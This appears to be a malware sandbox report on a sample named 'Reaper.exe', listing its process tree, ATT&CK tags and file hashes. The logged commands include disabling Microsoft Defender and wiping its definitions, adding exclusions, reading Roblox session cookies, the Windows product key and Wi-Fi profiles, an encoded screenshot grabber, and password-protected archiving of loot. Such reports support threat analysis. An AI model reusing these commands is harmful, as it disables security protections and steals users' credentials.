C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"4⤵PID:8160
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵PID:6756
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}1⤵PID:4880
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2032
-
C:\Users\Admin\Desktop\Reaper.exe"C:\Users\Admin\Desktop\Reaper.exe"1⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:3960 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="2⤵
- Command and Scripting Interpreter: PowerShell
PID:6876 -
C:\Users\Admin\AppData\Local\Temp\Reaper.exe"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"2⤵PID:7404
-
C:\Users\Admin\Windows Driver Foundation.exe"C:\Users\Admin\Windows Driver Foundation.exe"2⤵PID:7760
-
C:\Users\Admin\Windows Service Wrapper.exe"C:\Users\Admin\Windows Service Wrapper.exe"2⤵PID:5384
-
C:\Users\Admin\Windows SmartScreen.exe"C:\Users\Admin\Windows SmartScreen.exe"2⤵
- Suspicious use of SetWindowsHookEx
PID:3680 -
C:\Users\Admin\Windows SmartScreen.exe"C:\Users\Admin\Windows SmartScreen.exe"3⤵
- Suspicious use of SetWindowsHookEx
PID:8096
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:6452
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵PID:1132
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:7000
-
C:\Users\Public\Windows Service Wrapper.exe"C:\Users\Public\Windows Service Wrapper.exe"1⤵PID:6432
-
C:\Users\Admin\Desktop\Reaper.exe"C:\Users\Admin\Desktop\Reaper.exe"1⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:7224 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="2⤵
- Command and Scripting Interpreter: PowerShell
PID:4380 -
C:\Users\Admin\AppData\Local\Temp\Reaper.exe"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"2⤵PID:5604
-
C:\Users\Admin\Windows Driver Foundation.exe"C:\Users\Admin\Windows Driver Foundation.exe"2⤵PID:7200
-
C:\Users\Admin\Windows Service Wrapper.exe"C:\Users\Admin\Windows Service Wrapper.exe"2⤵PID:6192
-
C:\Users\Admin\Windows SmartScreen.exe"C:\Users\Admin\Windows SmartScreen.exe"2⤵
- Suspicious use of SetWindowsHookEx
PID:5580 -
C:\Users\Admin\Windows SmartScreen.exe"C:\Users\Admin\Windows SmartScreen.exe"3⤵
- Drops file in Drivers directory
- Suspicious use of SetWindowsHookEx
PID:3972 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Windows SmartScreen.exe'"4⤵PID:6208
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Windows SmartScreen.exe'5⤵
- Command and Scripting Interpreter: PowerShell
PID:2692 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"4⤵PID:4572
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend5⤵PID:816
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"4⤵PID:3336
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'5⤵
- Command and Scripting Interpreter: PowerShell
PID:4904 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:5200
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:4456 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:1380
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:7660 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"4⤵PID:6008
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:6696
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName5⤵PID:5196
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"4⤵PID:4068
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard5⤵PID:4756
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:5304
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:5768 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:4620
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:6492
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"4⤵PID:656
-
C:\Windows\system32\netsh.exenetsh wlan show profile5⤵PID:6168
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"4⤵PID:3056
-
C:\Windows\system32\systeminfo.exesysteminfo5⤵
- Gathers system information
PID:860 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"4⤵PID:4840
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath5⤵PID:5244
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="4⤵PID:1392
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=5⤵
- Command and Scripting Interpreter: PowerShell
PID:972 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\djltw2cq\djltw2cq.cmdline"6⤵PID:6648
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES78E4.tmp" "c:\Users\Admin\AppData\Local\Temp\djltw2cq\CSCC7294F3483584A76BCA838184309E1E.TMP"7⤵PID:5220
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:5984
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:5556
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:5236
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"4⤵PID:4692
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts5⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:7724 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:5268
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:6608
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"4⤵PID:4996
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts5⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:5280 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:7460
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:5644
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:1512
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:5612 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:3416
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:468
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:4816
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:5968
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"4⤵PID:6068
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵PID:7632
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"4⤵PID:8172
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵PID:7376
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"4⤵PID:5652
-
C:\Windows\system32\getmac.exegetmac5⤵PID:6876
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI55802\rar.exe a -r -hp"L8Ot" "C:\Users\Admin\AppData\Local\Temp\nrLZx.zip" *"4⤵PID:4600
-
C:\Users\Admin\AppData\Local\Temp\_MEI55802\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI55802\rar.exe a -r -hp"L8Ot" "C:\Users\Admin\AppData\Local\Temp\nrLZx.zip" *5⤵
- Suspicious use of SetWindowsHookEx
PID:776 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"4⤵PID:3060
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption5⤵PID:624
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"4⤵PID:6312
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory5⤵PID:7448
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵PID:1280
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵PID:6692
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"4⤵PID:6132
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER5⤵PID:2976
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵PID:7380
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
PID:4620 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"4⤵PID:2140
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵PID:8140
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
53KB
MD5124edf3ad57549a6e475f3bc4e6cfe51
SHA180f5187eeebb4a304e9caa0ce66fcd78c113d634
SHA256638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675
SHA512b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee
-
Filesize
124KB
MD59618e15b04a4ddb39ed6c496575f6f95
SHA11c28f8750e5555776b3c80b187c5d15a443a7412
SHA256a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab
SHA512f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26
-
Filesize
20KB
MD542c395b8db48b6ce3d34c301d1eba9d5
SHA1b7cfa3de344814bec105391663c0df4a74310996
SHA2565644546ecefc6786c7be5b1a89e935e640963ccd34b130f21baab9370cb9055d
SHA5127b9214db96e9bec8745b4161a41c4c0520cdda9950f0cd3f12c7744227a25d639d07c0dd68b552cf1e032181c2e4f8297747f27bad6c7447b0f415a86bd82845
-
Filesize
20KB
MD549693267e0adbcd119f9f5e02adf3a80
SHA13ba3d7f89b8ad195ca82c92737e960e1f2b349df
SHA256d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f
